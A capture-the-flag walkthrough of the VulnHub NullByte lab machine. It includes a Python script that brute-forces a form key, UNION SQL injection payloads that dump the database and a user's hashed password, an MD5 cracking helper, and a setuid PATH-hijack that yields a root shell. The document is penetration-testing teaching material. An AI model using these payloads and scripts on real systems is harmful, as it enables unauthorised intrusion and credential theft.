VulnHub : NullByte
26 June, 2021
Machine Link: https://www.vulnhub.com/entry/nullbyte-1,126/
Starting off with an nmap scan
$ sudo nmap -A -sC -sV -O -p 1-65535 192.168.110.101
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.110.101
Host is up (0.00090s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37492/udp status
| 100024 1 39222/udp6 status
| 100024 1 39668/tcp6 status
|_ 100024 1 59473/tcp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
59473/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:48:A2:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.90 ms 192.168.110.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds
Running gobuster against the website with the common wordlist revealed two paths
/uploads (Status: 200) [Size: 113]
/phpmyadmin (Status: 200) [Size: 9123]
The root page had a GIF (main.gif), so I ran it through exiftool and found a comment in its metadata:
$ exiftool main.gif
ExifTool Version Number : 12.26
File Name : main.gif
Directory : .
File Size : 16 KiB
File Modification Date/Time : 2015:08:01 22:09:30+05:30
File Access Date/Time : 2021:06:26 18:35:56+05:30
File Inode Change Date/Time : 2021:06:26 18:35:56+05:30
File Permissions : -rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071
This turned out to be a directory, /kzMb5nVYJw/, which leads to a password input page. There was also an HTML comment in that page's source:
<!-- this form isn't connected to mysql, password ain't that complex --!>
My first thought was that if the password is hardcoded and the input is compared against it with PHP's strcmp(), the check could be bypassed by submitting the key as an array (key[]=x): strcmp() on an array returns NULL with a warning, and NULL == 0 is true under loose comparison. That didn't work here, so I resorted to brute forcing with the rockyou list, automated with a small Python script:
import requests
import sys

# POST each wordlist entry as the 'key' field until the page stops saying 'invalid key'.
# rockyou.txt is not valid UTF-8 throughout, so open it with a permissive encoding.
with open(sys.argv[1], encoding='latin-1') as wordlist:
    for line in wordlist:
        word = line.rstrip('\n')
        r = requests.post('http://192.168.110.101/kzMb5nVYJw/index.php', data={'key': word})
        if 'invalid key' not in r.text:
            print(word)
            break
And it found the key:
# python3 exp.py wordlists/rockyou.txt
elite
The next screen was another form (420search.php), and it looked vulnerable to SQL injection: closing the string with a double quote and appending OR 1 = 1 returned every row:
# curl "http://192.168.110.101/kzMb5nVYJw/420search.php?usrtosearch=%22+OR+1+%3D+1+--+-"
EMP ID :1 <br> EMP NAME : ramses <br> EMP POSITION : <br> --------------------------------<br>EMP ID :2 <br> EMP NAME : isis <br> EMP POSITION : employee <br> --------------------------------<br>Fetched data successfully
Using the following UNION query against information_schema.tables, I retrieved the list of all base tables (schema, type and name land in the three reflected columns):
" OR 1 = 1 UNION ALL SELECT TABLE_SCHEMA, TABLE_TYPE, TABLE_NAME FROM information_schema.tables WHERE TABLE_TYPE='BASE TABLE'-- -
EMP ID :1
EMP NAME : ramses
EMP POSITION :
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : employee
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : columns_priv
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : db
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : event
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : func
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : general_log
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : help_category
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : help_keyword
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : help_relation
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : help_topic
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : host
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : ndb_binlog_index
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : plugin
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : proc
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : procs_priv
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : proxies_priv
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : servers
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : slow_log
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : tables_priv
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone_leap_second
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone_name
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone_transition
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone_transition_type
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : user
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : cond_instances
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_current
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_history
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_history_long
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_summary_by_instance
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_summary_by_thread_by_event_name
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_summary_global_by_event_name
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : file_instances
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : file_summary_by_event_name
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : file_summary_by_instance
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : mutex_instances
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : performance_timers
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : rwlock_instances
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : setup_consumers
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : setup_instruments
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : setup_timers
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : threads
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__bookmark
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__column_info
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__designer_coords
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__favorite
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__history
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__navigationhiding
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__pdf_pages
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__recent
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__relation
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__savedsearches
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__table_coords
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__table_info
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__table_uiprefs
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__tracking
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__userconfig
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__usergroups
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__users
--------------------------------
EMP ID :seth
EMP NAME : BASE TABLE
EMP POSITION : users
--------------------------------
Fetched data successfully
The users table in the seth database looked worth a closer look. Using the following query against information_schema.columns, I retrieved its column names:
" OR 1 = 1 UNION ALL SELECT COLUMN_NAME, table_schema, TABLE_NAME FROM information_schema.columns WHERE TABLE_NAME='users'-- -
EMP ID :1
EMP NAME : ramses
EMP POSITION :
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : employee
--------------------------------
EMP ID :id
EMP NAME : seth
EMP POSITION : users
--------------------------------
EMP ID :user
EMP NAME : seth
EMP POSITION : users
--------------------------------
EMP ID :pass
EMP NAME : seth
EMP POSITION : users
--------------------------------
EMP ID :position
EMP NAME : seth
EMP POSITION : users
--------------------------------
Fetched data successfully
The pass column for ramses held what looked like a base64-encoded value (43 characters, so it is missing its trailing = padding); the value for isis was masked as --not allowed--:
" OR 1 = 1 UNION ALL SELECT id,user,pass FROM seth.users-- -
EMP ID :1
EMP NAME : ramses
EMP POSITION :
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : employee
--------------------------------
EMP ID :1
EMP NAME : ramses
EMP POSITION : YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : --not allowed--
--------------------------------
Fetched data successfully
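As an added example (not code from the original walkthrough), here is a small Python helper for the injection point above: it builds the three-column UNION payloads in the form the page used, URL-encodes them the way the curl request did, and parses the raw "EMP ID / EMP NAME / EMP POSITION" response into rows, dropping the two real employees so only the injected rows remain. The sample response is constructed from the curl output shown on the page; the regex assumes that raw format, and fetch() is the only function that touches the box, so the demo runs offline.

```python
import re
import urllib.parse
import urllib.request

# Injection point as seen in the walkthrough; only fetch() ever contacts it.
SEARCH_URL = "http://192.168.110.101/kzMb5nVYJw/420search.php"
PARAM = "usrtosearch"

# The two legitimate rows that " OR 1 = 1 always returns; everything else is ours.
BASELINE_ROWS = {("1", "ramses", ""), ("2", "isis", "employee")}

# Raw response format (one row per match), assumed from the curl output on the page.
ROW_RE = re.compile(
    r"EMP ID :(.*?)<br>\s*EMP NAME :(.*?)<br>\s*EMP POSITION :(.*?)<br>\s*-+<br>",
    re.S,
)


def union_payload(columns, table, where=None):
    """Build the double-quote-breakout UNION payload used on the page.

    columns is the comma-separated select list (must be exactly three
    expressions, since the page reflects three columns); the trailing
    '-- -' comments out the rest of the original query.
    """
    sql = '" OR 1 = 1 UNION ALL SELECT ' + columns + " FROM " + table
    if where:
        sql += " WHERE " + where
    return sql + "-- -"


def build_url(payload):
    """Full GET URL with the payload URL-encoded exactly as curl was given it."""
    return SEARCH_URL + "?" + urllib.parse.urlencode({PARAM: payload})


def parse_rows(body):
    """Extract (id, name, position) tuples from the raw response body."""
    return [tuple(field.strip() for field in m.groups()) for m in ROW_RE.finditer(body)]


def injected_rows(body):
    """Keep only the rows the UNION added, dropping the real employees."""
    return [row for row in parse_rows(body) if row not in BASELINE_ROWS]


def fetch(payload, timeout=10):
    """Send a payload to the live box and return the body (not used offline)."""
    with urllib.request.urlopen(build_url(payload), timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample response modelled on the page's raw curl output for the
# seth.users dump; it is not captured traffic from the box.
SAMPLE_DUMP = (
    "EMP ID :1 <br> EMP NAME : ramses <br> EMP POSITION : <br> --------------------------------<br>"
    "EMP ID :2 <br> EMP NAME : isis <br> EMP POSITION : employee <br> --------------------------------<br>"
    "EMP ID :1 <br> EMP NAME : ramses <br> EMP POSITION : YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE <br> --------------------------------<br>"
    "EMP ID :2 <br> EMP NAME : isis <br> EMP POSITION : --not allowed-- <br> --------------------------------<br>"
    "Fetched data successfully"
)

if __name__ == "__main__":
    print(build_url(union_payload("id,user,pass", "seth.users")))
    for row in injected_rows(SAMPLE_DUMP):
        print(row)
```

Against the live box, `injected_rows(fetch(union_payload("TABLE_SCHEMA, TABLE_TYPE, TABLE_NAME", "information_schema.tables", "TABLE_TYPE='BASE TABLE'")))` reproduces the table listing above without the two employee rows cluttering it.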
# echo -n "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 --decode
c6d6bd7ebf806f43c76acc3681703b81
The decoded value is 32 hex characters, i.e. an MD5 digest, and it cracks to omega.
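As an added example (not part of the original walkthrough), the decode-and-crack step in Python. It re-adds the missing base64 padding that the page's value lacks (Python's base64 module rejects unpadded input, unlike the coreutils decoder), checks that the result looks like a hex MD5, and tries candidates from a wordlist. The five-word list is constructed here as a stand-in for rockyou.txt.

```python
import base64
import hashlib

# Value pulled from seth.users by the UNION query; note the missing '=' padding.
RAMSES_PASS_B64 = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "elite", "omega", "ramses"]


def b64decode_lenient(text):
    """Decode base64 that may be missing its trailing '=' padding.

    Base64 input must be a multiple of 4 characters; padding it back out
    is enough. Characters outside the alphabet still raise binascii.Error.
    """
    text = text.strip()
    text += "=" * (-len(text) % 4)
    return base64.b64decode(text, validate=True)


def looks_like_md5(text):
    """Raw MD5 is 16 bytes, so its hex form is exactly 32 hex digits."""
    return len(text) == 32 and all(c in "0123456789abcdef" for c in text.lower())


def crack_md5(hexdigest, candidates):
    """Return the first candidate whose MD5 equals hexdigest, else None.

    candidates can be any iterable of strings, e.g. lines of a wordlist file.
    """
    target = hexdigest.lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None


def recover_password(b64_value, candidates=WORDLIST):
    """Decode the stored value, sanity-check it, and crack it: (digest, plaintext)."""
    digest = b64decode_lenient(b64_value).decode("ascii")
    if not looks_like_md5(digest):
        raise ValueError(f"decoded value is not a hex MD5 digest: {digest!r}")
    return digest, crack_md5(digest, candidates)


if __name__ == "__main__":
    print(recover_password(RAMSES_PASS_B64))
```

To run it against the real list, pass `(line.rstrip("\n") for line in open("rockyou.txt", encoding="latin-1"))` as `candidates`; the generator keeps memory flat and the latin-1 encoding avoids the decode errors rockyou.txt otherwise triggers.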

With that password I was able to log in as ramses over SSH on port 777:
# ssh ramses@192.168.110.101 -p 777
ramses@192.168.110.101's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ whoami
ramses
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash
I found a root-owned SUID binary in /var/www/backup; note that the directory itself is world-writable (drwxrwxrwx):
ramses@NullByte:/var/www/backup$ ls -ltrha
total 24K
drwxr-xr-x 4 root root 4.0K Aug 2 2015 ..
-rwsr-xr-x 1 root root 4.9K Aug 2 2015 procwatch
-rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt
drwxrwxrwx 2 root root 4.0K Jun 27 07:30 .
ramses@NullByte:/var/www/backup$ cat readme.txt
I have to fix this mess...
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
21983 pts/0 00:00:00 procwatch
21984 pts/0 00:00:00 sh
21985 pts/0 00:00:00 ps
It printed a process list, so the binary apparently just executes ps as root. The sh process sitting between procwatch and ps suggests it goes through system(), i.e. /bin/sh -c ps, and the shell resolves a bare ps through PATH. Setuid execution does not sanitise PATH (glibc drops LD_PRELOAD and similar variables in secure mode, but not PATH), so if the binary does not call ps by its absolute path (/bin/ps), I can put my own ps first in PATH and have the root process run a shell instead. And it worked! Two caveats: /bin/sh on Debian is dash, which keeps the effective uid; if it had been bash, bash drops privileges when euid differs from uid unless started with -p. And the resulting shell has uid=1002 with euid=0, which is enough to read /root.
ramses@NullByte:/var/www/backup$ echo "/bin/sh" > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ PATH=.:$PATH ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# whoami
root
# cd /root
# ls
proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

[key body omitted]
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----
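To show the procwatch PATH hijack mechanically, here is an added Python simulation (not the box's binary or the walkthrough's own commands). It plants a fake ps in a temporary directory standing in for the world-writable /var/www/backup, runs ps the way system() does (/bin/sh -c ps, so the shell resolves the bare name through PATH), and contrasts that with the fix: an absolute path and a fixed environment. The simulation runs as the current user; on the box the same lookup happens inside a process whose effective uid is 0. It assumes a POSIX /bin/sh is present.

```python
import os
import shutil
import subprocess
import tempfile

# Stand-in for the page's  echo "/bin/sh" > ps ; it just announces the hijack.
FAKE_PS = "#!/bin/sh\necho HIJACKED\n"


def plant_fake_ps(directory):
    """Create an executable named 'ps' in directory (the writable dir on the box)."""
    path = os.path.join(directory, "ps")
    with open(path, "w") as f:
        f.write(FAKE_PS)
    os.chmod(path, 0o755)
    return path


def resolve(command, search_path):
    """Which file a shell would execute for a bare command under this PATH."""
    return shutil.which(command, path=search_path)


def run_like_procwatch(search_path):
    """Mimic system("ps"): spawn /bin/sh -c ps with the given PATH.

    A setuid binary inherits the caller's PATH unchanged, which is exactly
    why the bare name is dangerous; here it simply runs as the current user.
    """
    env = dict(os.environ, PATH=search_path)
    proc = subprocess.run("ps", shell=True, env=env, capture_output=True, text=True)
    return proc.stdout.strip()


def run_hardened():
    """The fix: absolute path, no shell, fixed environment.

    Returns None when /bin/ps is not installed on this machine (e.g. a
    minimal container), since then there is nothing to execute.
    """
    argv, env = ["/bin/ps"], {"PATH": "/usr/bin:/bin"}
    if not os.path.exists(argv[0]):
        return None
    return subprocess.run(argv, env=env, capture_output=True, text=True).stdout


def demo():
    """Run both variants with the attacker's directory first in PATH."""
    with tempfile.TemporaryDirectory() as tmp:
        plant_fake_ps(tmp)
        # PATH=.:$PATH from the walkthrough, with tmp playing the role of '.'
        attacker_path = tmp + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        via_attacker = resolve("ps", attacker_path)
        via_hardened = resolve("ps", "/usr/bin:/bin")
        return {
            "hijacked_output": run_like_procwatch(attacker_path),
            "attacker_path_wins": via_attacker is not None and via_attacker.startswith(tmp),
            "hardened_path_in_tmp": via_hardened is not None and via_hardened.startswith(tmp),
            "hardened_output": run_hardened(),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Fixing the lookup is only half of it: a setuid root helper that exists to run ps should not be setuid at all, and if it must stay privileged it should execve() the absolute path with a fixed environment rather than go through a shell.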